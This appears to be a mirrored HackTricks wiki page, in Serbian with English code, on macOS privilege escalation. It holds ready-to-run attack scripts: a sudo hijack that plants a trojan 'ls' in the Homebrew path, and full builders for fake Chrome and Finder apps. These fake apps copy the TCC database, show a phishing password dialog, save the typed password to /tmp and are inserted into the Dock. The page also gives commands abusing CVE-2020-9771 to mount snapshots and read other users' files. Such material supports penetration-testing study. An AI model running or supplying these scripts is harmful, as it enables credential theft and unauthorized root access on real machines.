mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
9.1 KiB
9.1 KiB
macOS Privilege Escalation
{{#include ../../banners/hacktricks-training.md}}
TCC Privilege Escalation
Ako ste došli ovde tražeći TCC eskalaciju privilegija, idite na:
{{#ref}} macos-security-protections/macos-tcc/ {{#endref}}
Linux Privesc
Imajte na umu da većina trikova o eskalaciji privilegija koji utiču na Linux/Unix će takođe uticati na MacOS mašine. Tako da pogledajte:
{{#ref}} ../../linux-hardening/privilege-escalation/ {{#endref}}
User Interaction
Sudo Hijacking
Možete pronaći originalnu Sudo Hijacking tehniku unutar posta o Linux eskalaciji privilegija.
Međutim, macOS održava korisnikov PATH kada izvršava sudo. Što znači da bi drugi način da se postigne ovaj napad bio da se otmu drugi binarni fajlovi koje žrtva i dalje izvršava kada pokreće sudo:
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH
cat > /opt/homebrew/bin/ls <<EOF
#!/bin/bash
if [ "\$(id -u)" -eq 0 ]; then
whoami > /tmp/privesc
fi
/bin/ls "\$@"
EOF
chmod +x /opt/homebrew/bin/ls
# victim
sudo ls
Napomena da korisnik koji koristi terminal verovatno ima Homebrew instaliran. Tako da je moguće preuzeti binarne datoteke u /opt/homebrew/bin.
Imitacija Dock-a
Korišćenjem nekih socijalnih inženjeringa mogli biste imitirati, na primer, Google Chrome unutar dock-a i zapravo izvršiti svoj skript:
{{#tabs}} {{#tab name="Chrome Impersonation"}} Neki predlozi:
- Proverite u Dock-u da li postoji Chrome, i u tom slučaju uklonite tu stavku i dodajte lažnu Chrome stavku na istu poziciju u Dock nizu.
#!/bin/sh
# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';
rm -rf /tmp/Google\ Chrome.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Google\ Chrome.app/Contents/MacOS
mkdir -p /tmp/Google\ Chrome.app/Contents/Resources
# Payload to execute
cat > /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /Applications/Google\\\\ Chrome.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c -o /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
rm -rf /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c
chmod +x /tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome
# Info.plist
cat << EOF > /tmp/Google\ Chrome.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Google Chrome</string>
<key>CFBundleIdentifier</key>
<string>com.google.Chrome</string>
<key>CFBundleName</key>
<string>Google Chrome</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF
# Copy icon from Google Chrome
cp /Applications/Google\ Chrome.app/Contents/Resources/app.icns /tmp/Google\ Chrome.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
{{#endtab}}
{{#tab name="Finder Impersonation"}} Nekoliko predloga:
- Ne možete ukloniti Finder iz Dock-a, tako da, ako planirate da ga dodate u Dock, možete staviti lažni Finder odmah pored pravog. Za to treba da dodate lažni Finder unos na početak Dock niza.
- Druga opcija je da ga ne stavljate u Dock i samo ga otvorite, "Finder traži da kontroliše Finder" nije tako čudno.
- Još jedna opcija za eskalaciju na root bez traženja lozinke sa užasnom porukom je da naterate Findera da stvarno traži lozinku za obavljanje privilegovane radnje:
- Zatražite od Findera da kopira u
/etc/pam.dnovusudodatoteku (Poruka koja traži lozinku će ukazati da "Finder želi da kopira sudo") - Zatražite od Findera da kopira novi Authorization Plugin (Možete kontrolisati ime datoteke tako da poruka koja traži lozinku ukazuje da "Finder želi da kopira Finder.bundle")
#!/bin/sh
# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)
# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';
rm -rf /tmp/Finder.app/ 2>/dev/null
# Create App structure
mkdir -p /tmp/Finder.app/Contents/MacOS
mkdir -p /tmp/Finder.app/Contents/Resources
# Payload to execute
cat > /tmp/Finder.app/Contents/MacOS/Finder.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char *cmd = "open /System/Library/CoreServices/Finder.app & "
"sleep 2; "
"osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; "
"PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); "
"echo \$PASSWORD > /tmp/passwd.txt";
system(cmd);
return 0;
}
EOF
gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder
rm -rf /tmp/Finder.app/Contents/MacOS/Finder.c
chmod +x /tmp/Finder.app/Contents/MacOS/Finder
# Info.plist
cat << EOF > /tmp/Finder.app/Contents/Info.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleExecutable</key>
<string>Finder</string>
<key>CFBundleIdentifier</key>
<string>com.apple.finder</string>
<key>CFBundleName</key>
<string>Finder</string>
<key>CFBundleVersion</key>
<string>1.0</string>
<key>CFBundleShortVersionString</key>
<string>1.0</string>
<key>CFBundleInfoDictionaryVersion</key>
<string>6.0</string>
<key>CFBundlePackageType</key>
<string>APPL</string>
<key>CFBundleIconFile</key>
<string>app</string>
</dict>
</plist>
EOF
# Copy icon from Finder
cp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns
# Add to Dock
defaults write com.apple.dock persistent-apps -array-add '<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'
sleep 0.1
killall Dock
{{#endtab}} {{#endtabs}}
TCC - Eskalacija privilegija za root
CVE-2020-9771 - mount_apfs TCC zaobilaženje i eskalacija privilegija
Bilo koji korisnik (čak i oni bez privilegija) može kreirati i montirati snapshot vremenske mašine i pristupiti SVIM datotekama tog snapshot-a.
Jedina privilegija koja je potrebna je da aplikacija koja se koristi (kao što je Terminal) ima Pristup celom disku (FDA) (kTCCServiceSystemPolicyAllfiles) koji mora odobriti administrator.
# Create snapshot
tmutil localsnapshot
# List snapshots
tmutil listlocalsnapshots /
Snapshots for disk /:
com.apple.TimeMachine.2023-05-29-001751.local
# Generate folder to mount it
cd /tmp # I didn it from this folder
mkdir /tmp/snap
# Mount it, "noowners" will mount the folder so the current user can access everything
/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap
# Access it
ls /tmp/snap/Users/admin_user # This will work
Detaljnije objašnjenje može se pronaći u originalnom izveštaju.
Osetljive informacije
Ovo može biti korisno za eskalaciju privilegija:
{{#ref}} macos-files-folders-and-binaries/macos-sensitive-locations.md {{#endref}}
{{#include ../../banners/hacktricks-training.md}}